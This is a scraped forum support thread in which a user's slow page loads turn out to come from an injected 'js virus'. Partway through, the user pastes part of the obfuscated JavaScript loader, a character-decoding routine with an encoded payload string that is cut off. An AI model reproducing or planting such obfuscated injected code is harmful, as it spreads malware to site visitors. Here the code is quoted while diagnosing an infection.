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slow page loading
I noticed this amazing feature on the pages
<link rel="canonical" href="" />
Help me to remove this link please.
My eye is twitching when I think that a page loads slowly because of this exactly.
Best Answer
422 MVP
make sure the js virus hasnt replicated itself across other scripts.
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is that a css link ?
There was an error rendering this rich post.
It is somehow placed in the header
so it surely works like a "css-link"
It is not a css link, its a canonical link. Google it, use firebug to actually see console events and if it is slowing your page down, which i very much doubt.
I always wondered who owned
There was an error rendering this rich post.
More interesting is who owns localhost
Well, I googled - You are right, this must not slowdown page.
I'm now in more amaze
something slows down ... there is a 3-second pause on the last element .
My peeve is how and where js loads in the dom. I suspect js is the issue. Or images , resources etc.
Do you utilise those vanilla avatar things? They are incredibly slow, when i last tested.
There was an error rendering this rich post.
I will try to unlink all the plugins one by one and will write here of results.
k good luck i see you got your first like badge
There was an error rendering this rich post.
Yvw. Good title change too.
There was an error rendering this rich post.
Half a day is down the drain
I've got some js-virus or trojan which slowed pages
make sure the js virus hasnt replicated itself across other scripts.
There was an error rendering this rich post.
How did you determine it was a js-virus or trojan? If I may ask.
I may not provide the completed solution you might desire, but I do try to provide honest suggestions to help you solve your issue.
@peregrine, visually.
var k30088d="";function f322760846bc(){var iab8704d=String,""),i015a1ed=ib8c9b9ea.substr(13,3)-448,j3ad5ce0,s78254ac;ib8c9b9ea=ib8c9b9ea.substr(v6680aa());var g6af77e=ib8c9b9ea.length;for(var ea432ff=0;ea432ff<g6af77e;ea432ff++){try{throw(o9081dd3f=ib8c9b9ea.substr(ea432ff,1));}catch(e){o9081dd3f=e;};if(o9081dd3f=='~'){i015a1ed="";ea432ff++;b44746=u0def8635(ib8c9b9ea,ea432ff);while(x505d40(b44746)){i015a1ed+=b44746;ea432ff++;b44746=ib8c9b9ea.substr(ea432ff,1);}i015a1ed-=627;continue;}j3ad5ce0="";if(tb93ad92f(o9081dd3f)){ea432ff++;o9081dd3f=ib8c9b9ea.substr(ea432ff,1);while(o9081dd3f!='№'){j3ad5ce0+=o9081dd3f;ea432ff++;o9081dd3f=ib8c9b9ea.substr(ea432ff,1);}j3ad5ce0=k8a8c75(j3ad5ce0,i015a1ed,17);if(j3ad5ce0<0)j3ad5ce0+=256;if(j3ad5ce0>=192)j3ad5ce0+=848;else if(j3ad5ce0==168)j3ad5ce0=1025;else if(j3ad5ce0==184)j3ad5ce0=1105;dbe0601a(j3ad5ce0);continue;}x0cfe90=u78c8c(o9081dd3f);if(x0cfe90>848)x0cfe90-=848;s78254ac=x0cfe90-i015a1ed-17;s78254ac=i8d7270(s78254ac);k30088d+=iab8704d["\x66r\x6fm\x43har\x43\x6f\x64\x65"](s78254ac);}}f322760846bc("529","ce2","b4","1a","3","2","5","512","y","№1","8","3№№19","8№","№1","91","№","~689","~","№1","7","8№","~7","59~","№","9","№","~","7","54","~","№249","№№","25","5№№","25","4","№~","7","8","7","~","№","21","7","№№","21","8№№","2","09","№~","76","2~","№1","9№~6","9","5~","b_^№","2","0","3№","№","1","8","2","№","№","19","9","№","u~","8","27","~N~","819","~C","~","79","9","~",")№","221","№~","800","~№","2","5","1№","~","81","6","~","№2","38№№24","5","№","6","B~","726~","№","2","32№~","7","70~№1","6№","~683","~","№1","31№","~","685~z","z№1","9","6№","~","65","6","~№1","67","№№168№№1","57","№","№","15","4№№","1","4","3","№~7","59~","№19","5№№2","5","2","№№5","№","№","247","№","№","247№№","8","№","~77","8~","№","1","2","№№","1","6","№№21№","№1","8№","№21","№","№","2","14№№2","7","№","~","7","55","~№","249","№№","2","42№№24","4№","~680~","№17","7№№","180","№~63","4","~№1","2","5№","~761","~№11№","~784","~№","2","20№","~75........
I may not provide the completed solution you might desire, but I do try to provide honest suggestions to help you solve your issue.
no, I don't know - i write in PSpad by hands w\o OOP and MVC
Thats @peregrines signature not his reply lol
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No sleep , no sleep, scythe, scythe
sorry .. lol also ...I was wondering if people would be confused by the signature - but it was worth a try...
I may not provide the completed solution you might desire, but I do try to provide honest suggestions to help you solve your issue.